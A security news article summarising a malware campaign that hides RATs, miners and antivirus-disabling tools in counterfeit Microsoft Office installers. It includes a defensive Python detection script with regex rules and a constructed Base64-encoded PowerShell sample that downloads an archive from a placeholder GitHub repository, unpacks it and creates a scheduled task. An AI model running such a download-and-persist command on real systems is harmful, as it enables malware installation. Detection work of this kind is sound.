
Distribution of malware via counterfeit copies of Microsoft Office

Malware campaign analysis using counterfeit installers of popular software

A malware campaign spreads through pirated software, using fake Microsoft Office installers as the lure. The download URLs point to legitimate services, which makes them difficult to identify as malicious. The malware delivered includes RATs, cryptocurrency miners and antivirus evasion tools.


The AhnLab Security Intelligence Center (ASEC) has revealed a new malicious campaign targeting users looking for pirated versions of popular software such as Microsoft Office, Windows, and Hangul Word Processor. The attackers use fake Microsoft Office installers, tricking victims with a well-designed interface that lets them choose between different versions, languages, and 32-bit or 64-bit architectures. Behind this facade, various types of malware are hidden, including RATs, cryptocurrency miners, droppers, proxies and antivirus evasion tools. The fake installer launches obfuscated .NET malware, which connects to messaging channels such as Telegram or Mastodon to retrieve a valid download URL.

Malware distribution methodology

The retrieved URLs point to legitimate services such as Google Drive or GitHub, which makes it harder for antivirus products to identify them as malicious. The payloads are Base64-encoded and contain PowerShell commands that unpack different malware strains using 7-Zip. Among the components identified is a piece of malware called "Updater", which uses the Windows Task Scheduler to keep the threats persistent even after a system restart. This technique lets attackers maintain continuous access to the compromised system and makes it difficult for victims to fully clean their devices once infected.
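The chain described above (a Base64 layer hiding PowerShell that downloads from Google Drive or GitHub, unpacks with 7-Zip and registers a scheduled task) can be triaged from process command-line logs. The following Python sketch is an added example, not code from ASEC or the original article; the rule patterns, the sample command line and all EXAMPLE names are assumptions constructed for illustration.

```python
import base64
import re

# Heuristics for the behaviours the article describes. These patterns are
# assumptions made for this example, not indicators published by ASEC.
RULES = {
    "legit_hosting_download": re.compile(
        r"https?://(?:drive\.google\.com|github\.com|raw\.githubusercontent\.com)/", re.I),
    "sevenzip_unpack": re.compile(r"\b7z[ar]?(?:\.exe)?\s+[xe]\b", re.I),
    "scheduled_task": re.compile(r"\bschtasks(?:\.exe)?\s.*?/create|Register-ScheduledTask", re.I),
}
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def decode_layers(text):
    """Yield text decoded from long Base64 runs embedded in `text`."""
    for run in B64_RUN.findall(text):
        try:
            raw = base64.b64decode(run + "=" * (-len(run) % 4), validate=True)
            # PowerShell -EncodedCommand is UTF-16LE (NUL bytes); otherwise try UTF-8.
            yield raw.decode("utf-16-le" if b"\x00" in raw else "utf-8")
        except ValueError:  # bad Base64 or undecodable bytes: not a text layer
            continue


def triage(command_line):
    """Return the sorted rule names hit by the command line or a decoded layer."""
    layers = [command_line, *decode_layers(command_line)]
    return sorted({name for name, rx in RULES.items()
                   for layer in layers if rx.search(layer)})


# Constructed sample with placeholder names; not taken from the campaign.
STAGE = ("Invoke-WebRequest https://github.com/EXAMPLE-USER/EXAMPLE-REPO/raw/main/pkg.7z "
         "-OutFile pkg.7z; 7z.exe x pkg.7z; "
         "schtasks /create /tn EXAMPLE-TASK /tr app.exe /sc onlogon")
SAMPLES = {
    "encoded_stage": "powershell.exe -NoProfile -EncodedCommand "
                     + base64.b64encode(STAGE.encode("utf-16-le")).decode(),
    "benign": "powershell.exe -NoProfile -Command Get-ChildItem C:\\Users",
}

if __name__ == "__main__":
    for label, line in SAMPLES.items():
        print(label, triage(line))
```

A single hit is weak evidence on its own, since each behaviour also occurs in legitimate administration; the combination of all three inside an encoded layer is what merits investigation.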

Types of malware involved

ASEC research identified various types of malware installed via this campaign. Among these, Orcus RAT is a remote access Trojan that allows total control of the system, with keylogging functions, webcam access and other exfiltration capabilities. XMRig is a cryptocurrency miner that leverages system resources to mine Monero, suspending mining during heavy resource use to avoid suspicion. 3Proxy turns infected systems into proxy servers, allowing attackers to route malicious traffic. PureCrypter downloads and executes additional malicious payloads, ensuring continued infection. Finally, AntiAV disables security software, manipulating its configuration files to prevent it from working properly and leaving the system vulnerable.

Implications and advice for users

This strategy of infection through pirated software is not new but continues to be effective, as demonstrated by the spread of the STOP ransomware, currently one of the most active ransomware operations targeting consumer users. Pirated programs lack digital signatures and users tend to ignore security warnings since they know they are using unofficial material. This behavior, combined with any easily overlooked graphic discrepancies, makes pirated files an ideal vector for malware infections. You are strongly advised to avoid downloading and installing pirated software and always use authentic and updated versions of programs to avoid security compromises.


06/02/2024 08:31

Marco Verro
